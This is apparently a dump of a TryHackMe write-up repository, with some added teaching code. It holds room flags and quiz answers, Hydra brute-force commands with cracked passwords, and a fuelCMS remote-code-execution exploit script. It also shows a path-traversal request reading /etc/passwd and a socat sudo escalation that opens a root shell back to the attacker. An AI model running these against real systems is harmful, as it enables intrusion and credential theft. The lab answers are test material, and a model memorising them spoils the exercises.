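"""Decoder for zsteg-style LSB payload labels (added example, not zsteg code).

How the label "b1,bgr,lsb,xy" is read here (an assumption about the label):
  b1  - one bit taken from each channel (its least significant bit)
  bgr - channels read in blue, green, red order within each pixel
  lsb - the first bit collected becomes the least significant bit of the
        output byte (msb: the first bit collected is the most significant)
  xy  - pixels are walked left to right, top to bottom
"""
import random

# Byte offset of each selected channel inside an RGB triple.
CHANNEL_OFFSETS = {"rgb": (0, 1, 2), "bgr": (2, 1, 0), "r": (0,), "g": (1,), "b": (2,)}

def _parse_payload(payload):
    bits_spec, order, packing, walk = payload.split(",")
    if not bits_spec.startswith("b") or walk != "xy" or order not in CHANNEL_OFFSETS:
        raise ValueError("unsupported payload label: %s" % payload)
    return int(bits_spec[1:]), CHANNEL_OFFSETS[order], packing == "msb"

def _plane_bits(pixels, offsets, nbits):
    """Yield the nbits lowest bits of each selected channel, row-major order."""
    for base in range(0, len(pixels) - 2, 3):
        for off in offsets:
            value = pixels[base + off]
            for b in range(nbits - 1, -1, -1):
                yield (value >> b) & 1

def _pack(bits8, msb_first):
    """Assemble eight collected bits into one byte in the requested direction."""
    if not msb_first:
        bits8 = bits8[::-1]
    byte = 0
    for bit in bits8:
        byte = (byte << 1) | bit
    return byte

def extract(pixels, payload="b1,bgr,lsb,xy", max_bytes=64):
    """Recover a NUL-terminated message from raw RGB bytes using a payload label."""
    nbits, offsets, msb_first = _parse_payload(payload)
    bits = _plane_bits(pixels, offsets, nbits)
    out = bytearray()
    while len(out) < max_bytes:
        chunk = [bit for _, bit in zip(range(8), bits)]   # range first: no bit is lost
        if len(chunk) < 8:
            break                       # ran out of pixels before a terminator
        byte = _pack(chunk, msb_first)
        if byte == 0:
            break                       # NUL terminator ends the message
        out.append(byte)
    return bytes(out)

def embed(pixels, message, payload="b1,bgr,lsb,xy"):
    """Write message + NUL into the lowest bit of the selected channels."""
    nbits, offsets, msb_first = _parse_payload(payload)
    if nbits != 1:
        raise ValueError("embed only implements single-bit planes")
    bits = []
    for byte in message + b"\x00":
        eight = [(byte >> i) & 1 for i in range(7, -1, -1)]      # msb-first
        bits.extend(eight if msb_first else eight[::-1])
    slots = [base + off for base in range(0, len(pixels) - 2, 3) for off in offsets]
    if len(bits) > len(slots):
        raise ValueError("cover image too small for the message")
    out = bytearray(pixels)
    for idx, bit in zip(slots, bits):
        out[idx] = (out[idx] & 0xFE) | bit      # only the LSB changes
    return bytes(out)

def make_cover(width, height, seed=1):
    """Deterministic pseudo-random RGB pixels, constructed for this demo."""
    rng = random.Random(seed)
    return bytes(rng.randrange(256) for _ in range(width * height * 3))

if __name__ == "__main__":
    cover = make_cover(8, 8)
    stego = embed(cover, b"nootnoot$")
    print(extract(stego))                    # the message
    print(extract(stego, "b1,rgb,lsb,xy"))   # wrong channel order: garbage
```

Decoding the same pixels with a different channel order or packing direction produces unrelated bytes, which is why zsteg enumerates many payload labels and why the label in the answer above matters as much as the message itself.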
/CC-Steganography/spect/exam2.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/exam2.wav
--------------------------------------------------------------------------------
/CC-Steganography/spect/happynoot.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/happynoot.jpeg
--------------------------------------------------------------------------------
/CC-Steganography/spect/jpeg1.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/jpeg1.jpeg
--------------------------------------------------------------------------------
/CC-Steganography/spect/jpeg2.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/jpeg2.jpeg
--------------------------------------------------------------------------------
/CC-Steganography/spect/jpeg3.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/jpeg3.jpeg
--------------------------------------------------------------------------------
/CC-Steganography/spect/png1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/png1.png
--------------------------------------------------------------------------------
/CC-Steganography/spect/qrcode(edited).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/qrcode(edited).png
--------------------------------------------------------------------------------
/CC-Steganography/spect/qrcode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/qrcode.png
--------------------------------------------------------------------------------
/CC-Steganography/spect/wav1.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/wav1.wav
--------------------------------------------------------------------------------
/CC-Steganography/spect/wav2.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/wav2.wav
--------------------------------------------------------------------------------
/Djinn/README.md:
--------------------------------------------------------------------------------
# djinn | https://tryhackme.com/room/djinn

### [Task 2] Root It

Get both user.txt and root.txt

#1 User flag : 10aay8289ptgguy1pvfa73alzusyyx3c

#2 Root flag : 33eur2wjdmq80z47nyy4fx54bnlg3ibc
--------------------------------------------------------------------------------
/Google Dorking/README.md:
--------------------------------------------------------------------------------
# Google Dorking | https://tryhackme.com/room/googledorking

### [Task 2] Let's Learn About Crawlers

#1 What is the keyword for the contents that a "Search Engine" stores about a website? : ```index```

#2 What is the name of the technique that "Search Engines" use to retrieve this information about websites? : ```crawling```

#3 What is an example of the type of contents that could be gathered from a website? : ```keywords```

### [Task 3] Enter: Search Engine Optimisation

#1 Using the SEO Site Checkup tool on "tryhackme.com", does TryHackMe pass the “Meta Title Test”? (Yea / Nay) : ```Yea```

#2 Does "tryhackme.com" pass the “Keywords Usage Test”? (Yea / Nay) : ```Nay```

#3 Use https://neilpatel.com/seo-analyzer/ to analyse https://blog.cmnatic.co.uk. What "Page Score" does the domain receive out of 100? : ```81/100```

#4 With the same tool and domain as in Question #3, how many pages use “flash”? : ```0```

#5 From a "rating score" perspective alone, which website would list first: tryhackme.com or blog.cmnatic.co.uk? : ```blog.cmnatic.co.uk```

### [Task 4] Beepboop - Robots.txt

#1 Where would "robots.txt" be located on the domain "ablog.com"? : ```ablog.com/robots.txt```

#2 If a website was to have a sitemap, where would that be located? : ```/sitemap.xml```

#3 How would we only allow Bingbot to index the website? : ```user-agent :bingbot```

#4 How would we prevent a "Crawler" from indexing the directory "/dont-index-me/"? : ```disallow: /dont-index-me/```

#5 What is another configuration file that we might want to hide from "Crawlers"? : ```.conf```

### [Task 5] Sitemaps

#1 What is the typical file structure of a "Sitemap"? : ```XML```

#2 What real life example can "Sitemaps" be compared to? : ```MAP```

#3 Name the keyword for the path taken for content on a website : ```route```

### [Task 6] What is Google Dorking?

#1 What would be the format used to query the site bbc.co.uk about flood defences? : ```site: bbc.co.uk flood defences```

#2 What term would you use to search by file type? : ```filetype:```

#3 What term can we use to look for login pages? : ```intitle: login```
--------------------------------------------------------------------------------
/Hydra/README.md:
--------------------------------------------------------------------------------
# Hydra | https://tryhackme.com/room/hydra

### [Task 2] Using Hydra

#1 Use Hydra to bruteforce molly's web password. What is flag 1? : `THM{2673a7dd116de68e85c48ec0b1f2612e}`

#2 Use Hydra to bruteforce molly's SSH password. What is flag 2? : `THM{c8eeb0468febbadea859baeb33b2541b}`
--------------------------------------------------------------------------------
/Hydra/flag2.txt:
--------------------------------------------------------------------------------
THM{c8eeb0468febbadea859baeb33b2541b}
--------------------------------------------------------------------------------
/Hydra/ssh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Hydra/ssh.png
--------------------------------------------------------------------------------
/Hydra/ssh.txt:
--------------------------------------------------------------------------------
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.34.149 -t 4 ssh

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-25 11:37:13
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.34.149:22/
[22][ssh] host: 10.10.34.149   login: molly   password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-25 12:03:07
--------------------------------------------------------------------------------
/Hydra/web.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Hydra/web.png
--------------------------------------------------------------------------------
/Hydra/web.txt:
--------------------------------------------------------------------------------
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.34.149 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

[80][http-post-form] host: 10.10.34.149   login: molly   password: sunshine
--------------------------------------------------------------------------------
/Ignite/CVE-2018-16763.py:
--------------------------------------------------------------------------------
# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# CVE : CVE-2018-16763

import requests
import urllib

url = "http://10.10.12.120"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    xxxx = raw_input('cmd:')
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    proxy = {"http":"http://10.10.12.120:80"}
    r = requests.get(burp0_url)

    html = ""
    htmlcharset = r.text.find(html)

    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)

    print r.text[0:dup]
--------------------------------------------------------------------------------
/Ignite/README.md:
--------------------------------------------------------------------------------
# Ignite | https://tryhackme.com/room/ignite

### [Task 1] Root It

#1 User.txt : `6470e394cbf6dab6a91682cc8585059b`

#2 Root.txt : `b9bbcb33e11b80be759c4e844862482d`
--------------------------------------------------------------------------------
/Ignite/database.php:
--------------------------------------------------------------------------------
db->last_query() and profiling of DB queries.
| When you run a query, with this setting set to TRUE (default),
| CodeIgniter will store the SQL statement for debugging purposes.
| However, this may cause high memory usage, especially if you run
| a lot of SQL queries ... disable this to avoid that problem.
|
| The $active_group variable lets you choose which connection group to
| make active. By default there is only one group (the 'default' group).
|
| The $query_builder variables lets you determine whether or not to load
| the query builder class.
*/
$active_group = 'default';
$query_builder = TRUE;

$db['default'] = array(
    'dsn'      => '',
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'mememe',
    'database' => 'fuel_schema',
    'dbdriver' => 'mysqli',
    'dbprefix' => '',
    'pconnect' => FALSE,
    'db_debug' => (ENVIRONMENT !== 'production'),
    'cache_on' => FALSE,
    'cachedir' => '',
    'char_set' => 'utf8',
    'dbcollat' => 'utf8_general_ci',
    'swap_pre' => '',
    'encrypt'  => FALSE,
    'compress' => FALSE,
    'stricton' => FALSE,
    'failover' => array(),
    'save_queries' => TRUE
);

// used for testing purposes
if (defined('TESTING'))
{
    @include(TESTER_PATH.'config/tester_database'.EXT);
}
--------------------------------------------------------------------------------
/Ignite/database.txt:
--------------------------------------------------------------------------------
cat /var/www/html/fuel/application/config/database.php
--------------------------------------------------------------------------------
/Ignite/exploit-db.txt:
--------------------------------------------------------------------------------
https://www.exploit-db.com/exploits/47138
--------------------------------------------------------------------------------
/Ignite/nmap_basic.nmap:
--------------------------------------------------------------------------------
# Nmap 7.80 scan initiated Mon May 25 14:51:09 2020 as: nmap -A -oN nmap_basic.nmap 10.10.12.120
Nmap scan report for 10.10.12.120
Host is up (0.26s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/25%OT=80%CT=1%CU=44385%PV=Y%DS=2%DC=T%G=Y%TM=5ECB8E3
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=102%TI=Z%CI=I%TS=A)SEQ(SP=1
OS:02%GCD=1%ISR=103%TI=Z%CI=I%II=I%TS=A)SEQ(SP=102%GCD=1%ISR=103%TI=Z%II=I%
OS:TS=A)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5
OS:=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=
OS:68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Network Distance: 2 hops

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   218.27 ms 10.9.0.1
2   290.46 ms 10.10.12.120

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 25 14:51:57 2020 -- 1 IP address (1 host up) scanned in 47.56 seconds
--------------------------------------------------------------------------------
/Inclusion/README.md:
--------------------------------------------------------------------------------
# Inclusion | https://tryhackme.com/room/inclusion

### [Task 2] Root It

If you've deployed the VM then try to find the LFI parameters and get the user and root flag.
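The Inclusion room is about a local file inclusion in an `article?name=...` parameter (the request that pulls `/etc/passwd` is recorded in `passwd.txt` further down). The following is an added example, not code from the room or from this writeup: since the target runs a Werkzeug/Python application according to the nmap output, it sketches the vulnerable handler and a hardened one as plain Python functions, with no web framework, and runs both against a throwaway article directory created in a temporary folder. The directory layout, file names and the `../secret.txt` traversal string are all constructed for the demo.

```python
"""Path-traversal check for an "article?name=..." handler (added example).

read_article_vulnerable() shows the pattern that produces LFI: user input is
joined onto a base directory and opened as-is. read_article_safe() resolves
the real path and refuses anything that ends up outside the article folder.
The temporary tree built by demo() is constructed for this example.
"""
import os
import tempfile

def read_article_vulnerable(articles_dir, name):
    """Vulnerable: os.path.join keeps every '../' in name, so the resolved
    path can walk out of articles_dir (or, with an absolute name, replace it)."""
    with open(os.path.join(articles_dir, name)) as fh:
        return fh.read()

def read_article_safe(articles_dir, name):
    """Hardened: canonicalise both sides (symlinks and '..' resolved) and
    require the target to lie strictly inside the base directory."""
    base = os.path.realpath(articles_dir)
    target = os.path.realpath(os.path.join(base, name))
    # commonpath also defeats the "articles_dir-evil" prefix trick that a
    # plain startswith(base) check would miss.
    if target == base or os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes article directory: %r" % name)
    with open(target) as fh:
        return fh.read()

def demo():
    """Build <tmp>/articles/hacking.txt plus <tmp>/secret.txt one level up,
    then read both a normal name and a traversal through each handler."""
    root = tempfile.mkdtemp()
    articles = os.path.join(root, "articles")
    os.mkdir(articles)
    with open(os.path.join(articles, "hacking.txt"), "w") as fh:
        fh.write("article body")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("should never be readable via ?name=")
    traversal = "../secret.txt"   # same idea as ../../etc/passwd in passwd.txt
    results = {
        "normal_vuln": read_article_vulnerable(articles, "hacking.txt"),
        "normal_safe": read_article_safe(articles, "hacking.txt"),
        "traversal_vuln": read_article_vulnerable(articles, traversal),
    }
    try:
        read_article_safe(articles, traversal)
        results["traversal_safe"] = "ALLOWED"
    except PermissionError:
        results["traversal_safe"] = "BLOCKED"
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print("%-15s %s" % (key, value))
```

The hardened version still serves ordinary article names unchanged; only requests whose canonical path leaves the base directory are refused, and it raises rather than silently substituting a default file, so the rejected request shows up in the application log.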

#1 user flag : `60989655118397345799`

#2 root flag : `42964104845495153909`
--------------------------------------------------------------------------------
/Inclusion/nmap_basic.nmap:
--------------------------------------------------------------------------------
# Nmap 7.80 scan initiated Mon May 25 13:54:16 2020 as: nmap -sC -sS -sV -A -O -oN nmap_basic.nmap 10.10.43.97
Nmap scan report for 10.10.43.97
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
|   256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_  256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
|_http-title: My blog
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/25%OT=22%CT=1%CU=40879%PV=Y%DS=2%DC=T%G=Y%TM=5ECB80D
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=10A%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST1
OS:1NW6%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1025/tcp)
HOP RTT       ADDRESS
1   208.84 ms 10.9.0.1
2   194.01 ms 10.10.43.97

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 25 13:54:50 2020 -- 1 IP address (1 host up) scanned in 35.03 seconds
--------------------------------------------------------------------------------
/Inclusion/passwd.txt:
--------------------------------------------------------------------------------
http://10.10.43.97/article?name=../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash

#falconfeast:rootpassword

sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false
--------------------------------------------------------------------------------
/Inclusion/root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Inclusion/root.png
--------------------------------------------------------------------------------
/Inclusion/root.txt:
--------------------------------------------------------------------------------
╭─root@kali ~/TryHackMe/Rooms/Inclusion ‹master*›
╰─# socat file:`tty`,raw,echo=0 tcp-listen:1337

root@inclusion:~# cd /root/
root@inclusion:/root# ls
root.txt
root@inclusion:/root# cat root.txt
42964104845495153909
--------------------------------------------------------------------------------
/Inclusion/socat.txt:
--------------------------------------------------------------------------------
How to get root access if the user has sudo access for socat:

falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat

Run this on your host system: socat file:`tty`,raw,echo=0 tcp-listen:1337

and run this on the remote machine: sudo socat tcp-connect::1337 exec:bash,pty,stderr,setsid,sigint,sane
--------------------------------------------------------------------------------
/Inclusion/ssh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Inclusion/ssh.png
--------------------------------------------------------------------------------
/Inclusion/ssh.txt:
--------------------------------------------------------------------------------
ssh falconfeast@10.10.43.97
The authenticity of host '10.10.43.97 (10.10.43.97)' can't be established.
ECDSA key fingerprint is SHA256:VRi7CZbTMsqjwnWmH2UVPWrLVIZzG4BQ9J6X+tVsuEQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.43.97' (ECDSA) to the list of known hosts.
falconfeast@10.10.43.97's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon May 25 14:03:07 IST 2020

  System load:  0.0               Processes:           84
  Usage of /:   34.8% of 9.78GB   Users logged in:     0
  Memory usage: 65%               IP address for eth0: 10.10.43.97
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

3 packages can be updated.
3 updates are security updates.


Last login: Thu Jan 23 18:41:39 2020 from 192.168.1.107
falconfeast@inclusion:~$ ls
articles  user.txt
falconfeast@inclusion:~$ cat user.txt
60989655118397345799
--------------------------------------------------------------------------------
/Inclusion/view-source_10.10.43.97_article_name=.._.._.._.._.._.._etc_passwd.html:
--------------------------------------------------------------------------------
<!DOCTYPE html>

<html>

<body>


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash
#falconfeast:rootpassword
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false



</body>

</html>
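Two of the transcripts in this writeup end with `sudo -l` output that hands the user root directly: `CC-Pentesting/exam/ssh.txt` (nyan may run `/bin/su` as root with `NOPASSWD`) and `Inclusion/socat.txt` (falconfeast may run `/usr/bin/socat` the same way). The following audit helper is an added example, not code from the writeup or from any room: it parses `sudo -l` text and flags rules that grant root to a binary that can spawn or proxy a shell, which is the check a hardening review would run before an attacker does. The sample input is constructed from the two transcripts with one harmless `systemctl status` rule added as a control, and the list of shell-capable binaries is this example's own short list, not an authoritative catalogue.

```python
"""Flag dangerous sudo rules in `sudo -l` output (added example, not writeup code)."""
import re

# Binaries that can start a shell or hand one out; running them as root is
# equivalent to an unrestricted root account for that user. Short list
# constructed for this example, not a complete catalogue.
SHELL_CAPABLE = {
    "su", "bash", "sh", "dash", "zsh", "socat", "nc", "python", "python3",
    "perl", "vi", "vim", "less", "more", "find", "awk", "env",
}

# One rule line, e.g. "    (root) NOPASSWD: /bin/su" or "    (ALL : ALL) ALL".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)
USER_RE = re.compile(r"^User (\S+) may run the following commands on (\S+):")

def parse_sudo_l(text):
    """Return (user, host, run_as, nopasswd, command) tuples from `sudo -l` text.
    Rule lines are only accepted after a 'User X may run ...' header, so the
    'Matching Defaults entries' block is skipped."""
    rules, user, host = [], None, None
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user, host = m.group(1), m.group(2)
            continue
        m = RULE_RE.match(line)
        if m and user is not None:
            nopasswd = "NOPASSWD:" in m.group("tags")
            for cmd in m.group("cmds").split(","):
                rules.append((user, host, m.group("runas"), nopasswd, cmd.strip()))
    return rules

def risky_rules(rules):
    """Flag rules that run ALL, or a shell-capable binary, as root or ALL."""
    findings = []
    for user, host, runas, nopasswd, cmd in rules:
        as_root = runas.split(":")[0].strip() in ("root", "ALL")
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if as_root and (cmd == "ALL" or binary in SHELL_CAPABLE):
            findings.append({
                "user": user, "host": host, "command": cmd,
                "nopasswd": nopasswd,
                "severity": "critical" if nopasswd else "high",
            })
    return findings

# Constructed sample: the two `sudo -l` outputs from this writeup, plus one
# harmless rule (systemctl status) that must not be flagged.
SAMPLE = """\
Matching Defaults entries for nyan on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat
    (root) /usr/bin/systemctl status sshd
"""

def audit(text=SAMPLE):
    return risky_rules(parse_sudo_l(text))

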